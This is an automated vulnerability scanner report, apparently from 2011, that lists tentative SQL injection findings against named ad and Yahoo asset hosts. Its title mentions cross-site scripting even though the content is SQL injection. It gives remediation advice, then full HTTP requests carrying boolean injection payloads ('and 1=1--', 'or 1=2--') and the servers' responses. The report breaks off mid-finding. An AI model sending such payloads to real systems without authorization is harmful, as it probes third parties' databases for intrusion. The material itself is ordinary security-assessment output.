XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, 051302011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://as.jivox.com
Path:	/player/iabplayer.php

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the siteId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d1--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:41 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 2102
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
k1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26autoPlay%3Dtrue%26maxAds%3D3%26pauseBetweenAds%3D1000%26volume%3D0%26volumeInitAction%3DtoggleMute%26restartOnUnmute%3D1%26jivoxBranded%3Dfalse%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>

Request 2

GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d2--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:42 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 1956
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
jk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>

Summary

Severity:	High
Confidence:	Tentative
Host:	http://l.yimg.com
Path:	/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41506506'%20or%201%3d1--%20 and 41506506'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets41506506'%20or%201%3d1--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3807

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
1311&url=Yahoo!+Sports+assets41506506+39+or+1+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl+q29ccnbesingepfeqkkcbxmyjqxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a
...[SNIP]...

Request 2

GET /j/assets41506506'%20or%201%3d2--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3780

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ericks_win_nba_finals_061311&url=Yahoo!+Sports+assets41506506+39+or+1+2+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hr
...[SNIP]...

Summary

Severity:	High
Confidence:	Tentative
Host:	http://l.yimg.com
Path:	/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19026485'%20or%201%3d1--%20 and 19026485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets19026485'%20or%201%3d1--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3740

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ws%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek+ly2nnmsrvuyaltngrb6gv8ld'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hre
...[SNIP]...

Request 2

GET /j/assets19026485'%20or%201%3d2--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3717

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ref=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+2+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a l
...[SNIP]...

1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

